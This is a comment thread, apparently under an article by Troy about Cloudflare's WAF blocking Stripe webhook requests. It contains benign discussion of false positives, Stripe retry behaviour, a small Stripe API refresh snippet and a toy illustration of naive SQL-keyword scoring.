Indeed, in the end Troy disabled a certain rule for incoming requests from Stripe but not all. Just before publishing the article he discovered more (webhook) requests being blocked by a different rule. This seems like a continuous source of issues where valid (webhook) requests are being (arbitrarily) blocked. Why wouldn't you just disable all rules for requests coming from Stripe?


Cloudflare is a white elephant in my current org. We are probably paying them a lot, and we are having issues that would be easy for me to fix if I were running my own deployment anywhere else, but the platform team doesn't seem to know how to configure things, or doesn't care. So I end up with complaints from the business team that I can't act upon, because the setup is obscure, the few parts that I can see and manage are poorly documented, and I'm not even sure which features are supported by the company's plan. My org is at fault, but I doubt this is an exception.


I solved the stripe webhook issue for https://pinggy.io by adding a refresh button that calls the stripe API to double check all subscriptions for a user.
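
A sketch of what such a refresh can boil down to (stripe-python assumed; names are mine, not Pinggy's actual code):

    import stripe

    def refresh_subscriptions(stripe_customer_id: str) -> list[tuple[str, str]]:
        """Re-fetch every subscription straight from Stripe instead of
        trusting that all webhook deliveries made it through."""
        subs = stripe.Subscription.list(customer=stripe_customer_id, status="all")
        return [(s.id, s.status) for s in subs.auto_paging_iter()]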


I'm no expert, and this was really nice and easy to read and understand. Thanks for sharing, Troy.

Question: Should we even use Cloudflare for server-server communication such as webhooks, API calls etc?


If your API calls are so generic that you don't need to identify the caller using an API key or some other token then you might be able to get some mileage out of it. But personally I'd like all API calls to go to my servers and not someone else's. If only because I don't like 3rd parties having the ability to log the payloads of requests, and whoever terminates your SSL connections has that ability.


Suppose I use Stripe in a similar way to HIBP and a customer comes along just as my server has gone down. Would Stripe try again later? I think it should wait a little while, but I'd hope it'd automatically try again later as long as there's data that needs to be sync'd but isn't yet.

I can maybe imagine 403 being a "Don't try again" signal in a way that 500 or timed-out isn't.


Yes, it retries for up to three days according to documentation: https://stripe.com/docs/webhooks/best-practices#retry-logic


If it doesn't you can manually re-trigger it. That does require you to monitor it of course.


I had the same issue with one of my sites. I activated the CF OWASP ruleset and all hell broke loose (it took a while to backtrack, aka down the rabbit hole I went). I deactivated it and the problems remained. It took several hours before things were back to normal. All in all, CF is too big now; they want to have ALL the features, but the only feature I want is DDoS protection…


We had a very similar issue recently but with s3 presigned url uploads, cloudflare WAF and OWASP rules.

Worked fine one day on 'high'; the next day it started blocking random file uploads with a 'blocked by Cloudflare' page.


I guess things like this are why CF added the traffic sequence section in the portal. Another thing on the same theme is that the DDoS rules are first in line...


I wonder what is actually causing the error here. Looking at the diff of the two payloads on the site, I can't spot anything. It's a weird one, that's for sure.


Something real subtle probably, like enough of the redacted areas accidentally containing something that looks like SQL. Like WALTER contains ALTER, CASEY contains CASE, etc... enough to add the score up to failing.

Hopefully it's more convoluted than simple substring matches like that, but I've seen WAFs do that. If it is adding up substring matches, there is stuff like "subscription_update", "null", "created", "discountable", "total_count", etc, that would set a high floor.
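
To make the concern concrete, a toy sketch (purely illustrative; real WAF scoring uses tokenization and anomaly thresholds, not bare substring sums, and these weights are made up):

    SQL_TOKENS = {"alter": 3, "table": 2, "case": 2, "null": 1, "create": 2}
    THRESHOLD = 5

    def naive_score(payload: str) -> int:
        p = payload.lower()
        return sum(w for tok, w in SQL_TOKENS.items() if tok in p)

    print(naive_score("WALTER hired CASEY"))  # 5 -> blocked, though entirely innocent
    print(naive_score("hello world"))         # 0 -> allowed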



